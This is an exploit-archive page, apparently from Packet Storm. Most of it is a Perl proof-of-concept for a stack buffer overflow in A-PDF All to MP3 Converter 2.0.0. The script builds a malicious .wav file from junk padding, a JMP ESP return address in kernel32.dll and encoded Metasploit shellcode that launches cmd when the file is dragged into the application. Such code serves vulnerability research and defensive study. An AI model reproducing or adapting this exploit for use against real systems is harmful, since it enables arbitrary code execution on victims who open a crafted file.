what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

A-PDF All To MP3 Converter 2.0.0 Buffer Overflow

A-PDF All To MP3 Converter 2.0.0 Buffer Overflow
Posted Jan 17, 2011
Authored by h1ch4m

A-PDF All to MP3 Converter version 2.0.0 suffers from a .wav parsing buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | f53b72e457e3c8e6e6b5d9dc8746ad8f95847bde9e358de70e8ba7108c4c92a9

A-PDF All To MP3 Converter 2.0.0 Buffer Overflow

Change Mirror Download
# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 stack based buffer overflow
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: <= 2.0.0
# Tested on: Win XP SP3 French
# Date: 17/01/2011
# Author: h1ch4m
#Email: h1ch4m@live.fr
#Home: http://Net-Effects.blogspot.com
# triggering details: Open the app, drag the wav file, booom cmd pops out

my $file= "1.wav";
my $junk = "\x41" x 4128;
my $EIP = pack('V', 0x7c86467b); # JMP ESP (ff e4) kernel32.dll

# windows/exec - 220 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=seh, CMD=cmd
my $shellcode = "\x29\xc9\x83\xe9\xcf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76" .
"\x0e\xd1\xd1\xc1\x66\x83\xee\xfc\xe2\xf4\x2d\x39\x48\x66" .
"\xd1\xd1\xa1\xef\x34\xe0\x13\x02\x5a\x83\xf1\xed\x83\xdd" .
"\x4a\x34\xc5\x5a\xb3\x4e\xde\x66\x8b\x40\xe0\x2e\xf0\xa6" .
"\x7d\xed\xa0\x1a\xd3\xfd\xe1\xa7\x1e\xdc\xc0\xa1\x33\x21" .
"\x93\x31\x5a\x83\xd1\xed\x93\xed\xc0\xb6\x5a\x91\xb9\xe3" .
"\x11\xa5\x8b\x67\x01\x81\x4a\x2e\xc9\x5a\x99\x46\xd0\x02" .
"\x22\x5a\x98\x5a\xf5\xed\xd0\x07\xf0\x99\xe0\x11\x6d\xa7" .
"\x1e\xdc\xc0\xa1\xe9\x31\xb4\x92\xd2\xac\x39\x5d\xac\xf5" .
"\xb4\x84\x89\x5a\x99\x42\xd0\x02\xa7\xed\xdd\x9a\x4a\x3e" .
"\xcd\xd0\x12\xed\xd5\x5a\xc0\xb6\x58\x95\xe5\x42\x8a\x8a" .
"\xa0\x3f\x8b\x80\x3e\x86\x89\x8e\x9b\xed\xc3\x3a\x47\x3b" .
"\xbb\xd0\x4c\xe3\x68\xd1\xc1\x66\x81\xb9\xf0\xed\xbe\x56" .
"\x3e\xb3\x6a\x2f\xcf\x54\x3b\xb9\x67\xf3\x6c\x4c\x3e\xb3" .
"\xed\xd7\xbd\x6c\x51\x2a\x21\x13\xd4\x6a\x86\x75\xa3\xbe" .
"\xab\x66\x82\x2e\x14\x05\xbc\xb5\xc1\x66";

open($FILE,">$file");
print $FILE $junk.$EIP.$shellcode;
close($FILE);

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    0 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close